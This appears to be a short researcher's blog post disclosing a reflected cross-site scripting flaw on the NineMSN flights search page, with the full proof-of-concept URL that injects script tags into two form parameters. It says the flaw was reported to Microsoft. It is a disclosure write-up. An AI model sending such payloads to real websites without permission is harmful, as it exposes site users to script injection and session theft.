After browsing around on the NineMSN website for a little while (for about 10 minutes) I found a XSS vulnerability on a very common page. The NineMSN flights page is located here:
http://flights.ninemsn.com.au/
The page did not sanitise input from the depart and return input. The form was expecting a date but any string could be provided as input to execute an XSS attack.
Here is the vulnerability:
Vulnerable Code:
1 2 3 4 5 6 7 8 9 10 |
http://flights.ninemsn.com.au/flights/search ?wg_trip_type=true &wg_origin=1 &wg_destination=1 &wg_outbound_date=12/10/2012 &wg_inbound_date=15/10/2012 &wg_from="><script>alert(/XSS from field/)</script> &wg_to="><script>alert(/XSS to field/)</script> &ts_code=1 &ddcurrency=1 |
This vulnerability has been reported and I have been added to the Microsoft Hall of Fame for October 2012.
Why not have a look around Microsoft’s websites and see if you can find one too.